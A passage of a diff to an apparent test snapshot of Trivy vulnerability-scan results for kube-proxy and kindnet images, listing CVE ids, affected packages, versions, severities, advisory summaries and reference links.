traversal vulnerability. When extracting untrusted source packages in v2 and v3 source package formats that include a debian.tar, the in-place extraction can lead to directory traversal situations on specially crafted orig.tar and debian.tar tarballs.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "Dpkg::Source::Archive in dpkg, the Debian package management system, b ...", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-1664", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", + "value": "https://lists.debian.org/debian-security-announce/2022/msg00115.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-42", + "value": "https://security.netapp.com/advisory/ntap-20221007-0002/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220526-0009/", + "value": "https://ubuntu.com/security/notices/USN-5446-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", + "value": "https://ubuntu.com/security/notices/USN-5446-2", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-12886", + "installedVersion": "8.3.0-6", + "packageName": "gcc-8-base", + "references": [ + "https://access.redhat.com/security/cve/CVE-2018-12886", + "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "https://www.gnu.org/software/gcc/gcc-8/changes.html", + ], + }, + "category": "Vulnerability", + "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", + "references": [ { "type": "URL", - "value": "https://support.apple.com/kb/HT213255", + "value": "https://avd.aquasec.com/nvd/cve-2018-12886", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213256", + "value": "https://access.redhat.com/security/cve/CVE-2018-12886", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213257", + "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5355-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5355-2", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5359-1", + "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-15847", + "installedVersion": "8.3.0-6", + "packageName": "gcc-8-base", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "https://access.redhat.com/security/cve/CVE-2019-15847", + "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "https://linux.oracle.com/cve/CVE-2019-15847.html", + "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "https://www.cve.org/CVERecord?id=CVE-2019-15847", + ], + }, + "category": "Vulnerability", + "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5359-2", + "value": "https://avd.aquasec.com/nvd/cve-2019-15847", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5739-1", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-25032", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5111", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/24/1", + "value": "https://access.redhat.com/security/cve/CVE-2019-15847", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/28/1", + "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/28/3", + "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.16.0+incompatible", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-1996", - "installedVersion": "v2.9.5+incompatible", - "packageName": "github.com/emicklei/go-restful", + "fixedVersion": "2.2.12-1+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-34903", + "installedVersion": "2.2.12-1+deb10u1", + "packageName": "gpgv", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-1996", - "https://github.com/advisories/GHSA-r48q-9g5r-8q2h", - "https://github.com/emicklei/go-restful/commit/926662532deb450272956c7bc573978464aae74e", - "https://github.com/emicklei/go-restful/commit/f292efff46ae17e9d104f865a60a39a2ae9402f1", - "https://github.com/emicklei/go-restful/commit/fd3c327a379ce08c68ef18765bdc925f5d9bad10", - "https://github.com/emicklei/go-restful/issues/489", - "https://huntr.dev/bounties/be837427-415c-4d8c-808b-62ce20aa84f1", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/575BLJ3Y2EQBRNTFR2OSQQ6L2W6UCST3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OBDD3Q23RCGAGHIXUCWBU6N3S4RNAKXB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SO5QC2JFW2PXBWAE27OYYYL5SPFUBHTY/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W56PP46JVZEKCANBKXFKRVSBBRRMCY6V/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGQKWD6SE75PFBPFVSZYAKAVXKBZXKWS/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", - "https://pkg.go.dev/vuln/GO-2022-0619", - "https://security.netapp.com/advisory/ntap-20220923-0005/", - "https://www.cve.org/CVERecord?id=CVE-2022-1996", + "http://www.openwall.com/lists/oss-security/2022/07/02/1", + "https://access.redhat.com/errata/RHSA-2022:6602", + "https://access.redhat.com/security/cve/CVE-2022-34903", + "https://bugs.debian.org/1014157", + "https://bugzilla.redhat.com/2102868", + "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", + "https://dev.gnupg.org/T6027", + "https://errata.almalinux.org/9/ALSA-2022-6602.html", + "https://errata.rockylinux.org/RLSA-2022:6602", + "https://linux.oracle.com/cve/CVE-2022-34903.html", + "https://linux.oracle.com/errata/ELSA-2022-6602.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", + "https://security.netapp.com/advisory/ntap-20220826-0005/", + "https://ubuntu.com/security/notices/USN-5503-1", + "https://ubuntu.com/security/notices/USN-5503-2", + "https://www.cve.org/CVERecord?id=CVE-2022-34903", + "https://www.debian.org/security/2022/dsa-5174", + "https://www.openwall.com/lists/oss-security/2022/06/30/1", ], }, "category": "Vulnerability", - "description": "Authorization Bypass Through User-Controlled Key in GitHub repository emicklei/go-restful prior to v3.8.0.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "GnuPG through 2.3.6, in unusual situations where an attacker possesses any secret-key information from a victim's keyring and other constraints (e.g., use of GPGME) are met, allows signature forgery via injection into the status line.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "Authorization Bypass Through User-Controlled Key", + "name": "Signature spoofing via status line injection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1996", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1996", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-r48q-9g5r-8q2h", - }, - { - "type": "URL", - "value": "https://github.com/emicklei/go-restful/commit/926662532deb450272956c7bc573978464aae74e", + "value": "https://avd.aquasec.com/nvd/cve-2022-34903", }, { "type": "URL", - "value": "https://github.com/emicklei/go-restful/commit/f292efff46ae17e9d104f865a60a39a2ae9402f1", + "value": "http://www.openwall.com/lists/oss-security/2022/07/02/1", }, { "type": "URL", - "value": "https://github.com/emicklei/go-restful/commit/fd3c327a379ce08c68ef18765bdc925f5d9bad10", + "value": "https://access.redhat.com/errata/RHSA-2022:6602", }, { "type": "URL", - "value": "https://github.com/emicklei/go-restful/issues/489", + "value": "https://access.redhat.com/security/cve/CVE-2022-34903", }, { "type": "URL", - "value": "https://huntr.dev/bounties/be837427-415c-4d8c-808b-62ce20aa84f1", + "value": "https://bugs.debian.org/1014157", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/575BLJ3Y2EQBRNTFR2OSQQ6L2W6UCST3/", + "value": "https://bugzilla.redhat.com/2102868", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OBDD3Q23RCGAGHIXUCWBU6N3S4RNAKXB/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SO5QC2JFW2PXBWAE27OYYYL5SPFUBHTY/", + "value": "https://dev.gnupg.org/T6027", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W56PP46JVZEKCANBKXFKRVSBBRRMCY6V/", + "value": "https://errata.almalinux.org/9/ALSA-2022-6602.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://errata.rockylinux.org/RLSA-2022:6602", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGQKWD6SE75PFBPFVSZYAKAVXKBZXKWS/", + "value": "https://linux.oracle.com/cve/CVE-2022-34903.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://linux.oracle.com/errata/ELSA-2022-6602.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0619", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0005/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1996", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20220127200216-cd36cc0744dd", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", - ], - }, - "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", + "value": "https://security.netapp.com/advisory/ntap-20220826-0005/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", + "value": "https://ubuntu.com/security/notices/USN-5503-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://ubuntu.com/security/notices/USN-5503-2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-34903", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://www.debian.org/security/2022/dsa-5174", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://www.openwall.com/lists/oss-security/2022/06/30/1", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-14855", + "installedVersion": "2.2.12-1+deb10u1", + "packageName": "gpgv", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-14855", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14855", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14855", + "https://dev.gnupg.org/T4755", + "https://eprint.iacr.org/2020/014.pdf", + "https://lists.gnupg.org/pipermail/gnupg-announce/2019q4/000442.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-14855", + "https://rwc.iacr.org/2020/slides/Leurent.pdf", + "https://ubuntu.com/security/notices/USN-4516-1", + "https://usn.ubuntu.com/4516-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-14855", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the way certificate signatures could be forged using collisions found in the SHA-1 algorithm. An attacker could use this weakness to create forged certificate signatures. This issue affects GnuPG versions before 2.2.18.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "gnupg2: OpenPGP Key Certification Forgeries with SHA-1", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://avd.aquasec.com/nvd/cve-2019-14855", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://access.redhat.com/security/cve/CVE-2019-14855", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14855", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14855", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://dev.gnupg.org/T4755", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://eprint.iacr.org/2020/014.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://lists.gnupg.org/pipermail/gnupg-announce/2019q4/000442.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-14855", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://rwc.iacr.org/2020/slides/Leurent.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://ubuntu.com/security/notices/USN-4516-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://usn.ubuntu.com/4516-1/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-14855", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3219", + "installedVersion": "2.2.12-1+deb10u1", + "packageName": "gpgv", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-3219", + "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", + "https://dev.gnupg.org/D556", + "https://dev.gnupg.org/T5993", + "https://marc.info/?l=oss-security&m=165696590211434&w=4", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", + "https://security.netapp.com/advisory/ntap-20230324-0001/", + "https://www.cve.org/CVERecord?id=CVE-2022-3219", + ], + }, + "category": "Vulnerability", + "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "denial of service issue (resource consumption) using compressed packets", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://avd.aquasec.com/nvd/cve-2022-3219", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://access.redhat.com/security/cve/CVE-2022-3219", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://dev.gnupg.org/D556", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://dev.gnupg.org/T5993", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://marc.info/?l=oss-security&m=165696590211434&w=4", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://security.netapp.com/advisory/ntap-20230324-0001/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3219", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.9-3+deb10u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1271", + "installedVersion": "1.9-3", + "packageName": "gzip", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:4940", + "https://access.redhat.com/security/cve/CVE-2022-1271", + "https://bugzilla.redhat.com/2073310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "https://errata.rockylinux.org/RLSA-2022:4940", + "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "https://linux.oracle.com/cve/CVE-2022-1271.html", + "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "https://security.gentoo.org/glsa/202209-01", + "https://security.netapp.com/advisory/ntap-20220930-0006/", + "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "https://ubuntu.com/security/notices/USN-5378-1", + "https://ubuntu.com/security/notices/USN-5378-2", + "https://ubuntu.com/security/notices/USN-5378-3", + "https://ubuntu.com/security/notices/USN-5378-4", + "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "https://www.openwall.com/lists/oss-security/2022/04/07/8", + ], + }, + "category": "Vulnerability", + "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "arbitrary-file-write vulnerability", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://avd.aquasec.com/nvd/cve-2022-1271", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://access.redhat.com/errata/RHSA-2022:4940", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-1271", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://bugzilla.redhat.com/2073310", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", }, { "type": "URL", - "value": 